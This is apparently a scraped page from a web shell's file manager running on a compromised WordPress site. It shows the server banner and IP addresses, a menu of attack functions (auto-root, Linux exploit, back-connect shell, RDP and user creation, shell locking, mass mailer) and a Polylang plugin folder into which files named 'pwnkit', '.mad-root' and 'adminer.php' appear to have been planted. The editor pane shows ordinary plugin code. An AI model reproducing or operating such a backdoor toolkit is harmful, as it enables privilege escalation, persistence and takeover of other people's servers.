Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
plugins /
polylang /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Capabilities
[ DIR ]
drwxr-xr-x
Model
[ DIR ]
drwxr-xr-x
Options
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
frontend
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
integrations
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
settings
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
api.php
21.77
KB
-rw-r--r--
base.php
6.11
KB
-rw-r--r--
cache.php
2.4
KB
-rw-r--r--
class-polylang.php
8.34
KB
-rw-r--r--
constant-functions.php
1.81
KB
-rw-r--r--
cookie.php
3.03
KB
-rw-r--r--
crud-posts.php
12.82
KB
-rw-r--r--
crud-terms.php
8.75
KB
-rw-r--r--
default-term.php
6.44
KB
-rw-r--r--
filter-rest-routes.php
4.98
KB
-rw-r--r--
filters-links.php
5.64
KB
-rw-r--r--
filters-sanitization.php
3.23
KB
-rw-r--r--
filters-widgets-options.php
2.63
KB
-rw-r--r--
filters.php
12.94
KB
-rw-r--r--
format-util.php
3.04
KB
-rw-r--r--
functions.php
5.14
KB
-rw-r--r--
language-deprecated.php
7.13
KB
-rw-r--r--
language-factory.php
9.4
KB
-rw-r--r--
language.php
18.07
KB
-rw-r--r--
license.php
9.39
KB
-rw-r--r--
links-abstract-domain.php
3.16
KB
-rw-r--r--
links-default.php
3.03
KB
-rw-r--r--
links-directory.php
9.5
KB
-rw-r--r--
links-domain.php
2.91
KB
-rw-r--r--
links-model.php
6.52
KB
-rw-r--r--
links-permalinks.php
5.62
KB
-rw-r--r--
links-subdomain.php
2.16
KB
-rw-r--r--
links.php
1.38
KB
-rw-r--r--
mo.php
3.42
KB
-rw-r--r--
model.php
22.96
KB
-rw-r--r--
nav-menu.php
4.5
KB
-rw-r--r--
olt-manager.php
2.98
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
query.php
7.73
KB
-rw-r--r--
rest-request.php
4.22
KB
-rw-r--r--
static-pages.php
6.27
KB
-rw-r--r--
switcher.php
10.97
KB
-rw-r--r--
term-slug.php
4.89
KB
-rw-r--r--
translatable-object-with-types...
1.03
KB
-rw-r--r--
translatable-object-with-types...
1.96
KB
-rw-r--r--
translatable-object.php
17.62
KB
-rw-r--r--
translatable-objects.php
3.71
KB
-rw-r--r--
translate-option.php
13.1
KB
-rw-r--r--
translated-object.php
18.93
KB
-rw-r--r--
translated-post.php
17.17
KB
-rw-r--r--
translated-term.php
14.82
KB
-rw-r--r--
walker-dropdown.php
3.77
KB
-rw-r--r--
walker-list.php
2.54
KB
-rw-r--r--
walker.php
2.38
KB
-rw-r--r--
widget-calendar.php
11.58
KB
-rw-r--r--
widget-languages.php
5.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : base.php
<?php /** * @package Polylang */ use WP_Syntex\Polylang\REST\Request; use WP_Syntex\Polylang\Capabilities\Capabilities; /** * Base class for both admin and frontend * * @since 1.2 */ #[AllowDynamicProperties] abstract class PLL_Base { /** * Capabilities. * * @since 3.8 * * @var Capabilities */ public $capabilities; /** * Stores the plugin options. * * @var \WP_Syntex\Polylang\Options\Options */ public $options; /** * @var PLL_Model */ public $model; /** * Instance of a child class of PLL_Links_Model. * * @var PLL_Links_Model */ public $links_model; /** * Registers hooks on insert / update post related actions and filters. * * @var PLL_CRUD_Posts|null */ public $posts; /** * Registers hooks on insert / update term related action and filters. * * @var PLL_CRUD_Terms|null */ public $terms; /** * @var Request */ public $request; /** * Constructor. * * @since 1.2 * * @param PLL_Links_Model $links_model Links Model. */ public function __construct( PLL_Links_Model &$links_model ) { $this->capabilities = new Capabilities(); $this->links_model = &$links_model; $this->model = &$links_model->model; $this->options = $this->model->options; $this->request = new Request( $this->model ); $GLOBALS['l10n_unloaded']['pll_string'] = true; // Short-circuit _load_textdomain_just_in_time() for 'pll_string' domain in WP 4.6+ add_action( 'widgets_init', array( $this, 'widgets_init' ) ); // User defined strings translations add_action( 'pll_language_defined', array( $this, 'load_strings_translations' ), 5 ); add_action( 'change_locale', array( $this, 'load_strings_translations' ) ); // Since WP 4.7 add_action( 'personal_options_update', array( $this, 'load_strings_translations' ), 1, 0 ); // Before WP, for confirmation request when changing the user email. add_action( 'lostpassword_post', array( $this, 'load_strings_translations' ), 10, 0 ); // Password reset email. // Switch_to_blog add_action( 'switch_blog', array( $this, 'switch_blog' ), 10, 2 ); } /** * Instantiates classes reacting to CRUD operations on posts and terms, * only when at least one language is defined. * * @since 2.6 * * @return void */ public function init() { if ( $this->model->has_languages() ) { $this->posts = new PLL_CRUD_Posts( $this ); $this->terms = new PLL_CRUD_Terms( $this ); // WordPress options. new PLL_Translate_Option( 'blogname', array(), array( 'context' => 'WordPress' ) ); new PLL_Translate_Option( 'blogdescription', array(), array( 'context' => 'WordPress' ) ); new PLL_Translate_Option( 'date_format', array(), array( 'context' => 'WordPress' ) ); new PLL_Translate_Option( 'time_format', array(), array( 'context' => 'WordPress' ) ); } } /** * Registers our widgets * * @since 0.1 * * @return void */ public function widgets_init() { register_widget( 'PLL_Widget_Languages' ); // Overwrites the calendar widget to filter posts by language if ( ! defined( 'PLL_WIDGET_CALENDAR' ) || PLL_WIDGET_CALENDAR ) { unregister_widget( 'WP_Widget_Calendar' ); register_widget( 'PLL_Widget_Calendar' ); } } /** * Loads user defined strings translations * * @since 1.2 * @since 2.1.3 $locale parameter added. * * @param string $locale Language locale or slug. Defaults to current locale. * @return void */ public function load_strings_translations( $locale = '' ) { if ( empty( $locale ) ) { $locale = ( is_admin() && ! Polylang::is_ajax_on_front() ) ? get_user_locale() : get_locale(); } $language = $this->model->get_language( $locale ); if ( ! empty( $language ) ) { $mo = new PLL_MO(); $mo->import_from_db( $language ); $GLOBALS['l10n']['pll_string'] = &$mo; } else { unset( $GLOBALS['l10n']['pll_string'] ); } } /** * Resets some variables when the blog is switched. * Applied only if Polylang is active on the new blog. * * @since 1.5.1 * * @param int $new_blog_id New blog ID. * @param int $prev_blog_id Previous blog ID. * @return void */ public function switch_blog( $new_blog_id, $prev_blog_id ) { if ( (int) $new_blog_id === (int) $prev_blog_id ) { // Do nothing if same blog. return; } $this->links_model->remove_filters(); if ( $this->is_active_on_current_site() ) { $this->links_model = $this->model->get_links_model(); } } /** * Checks if Polylang is active on the current blog (useful when the blog is switched). * * @since 3.5.2 * * @return bool */ protected function is_active_on_current_site(): bool { return pll_is_plugin_active( POLYLANG_BASENAME ) && ! empty( $this->options['version'] ); } /** * Check if the customize menu should be removed or not. * * @since 3.2 * * @return bool True if it should be removed, false otherwise. */ public function should_customize_menu_be_removed() { // Exit if a block theme isn't activated. if ( ! function_exists( 'wp_is_block_theme' ) || ! wp_is_block_theme() ) { return false; } return ! $this->is_customize_register_hooked(); } /** * Tells whether or not Polylang or third party callbacks are hooked to `customize_register`. * * @since 3.4.3 * * @global $wp_filter * * @return bool True if Polylang's callbacks are hooked, false otherwise. */ protected function is_customize_register_hooked() { global $wp_filter; if ( empty( $wp_filter['customize_register'] ) || ! $wp_filter['customize_register'] instanceof WP_Hook ) { return false; } /* * 'customize_register' is hooked by: * @see PLL_Nav_Menu::create_nav_menu_locations() * @see PLL_Frontend_Static_Pages::filter_customizer() */ $floor = 0; if ( ! empty( $this->nav_menu ) && (bool) $wp_filter['customize_register']->has_filter( 'customize_register', array( $this->nav_menu, 'create_nav_menu_locations' ) ) ) { ++$floor; } if ( ! empty( $this->static_pages ) && (bool) $wp_filter['customize_register']->has_filter( 'customize_register', array( $this->static_pages, 'filter_customizer' ) ) ) { ++$floor; } $count = array_sum( array_map( 'count', $wp_filter['customize_register']->callbacks ) ); return $count > $floor; } }
Close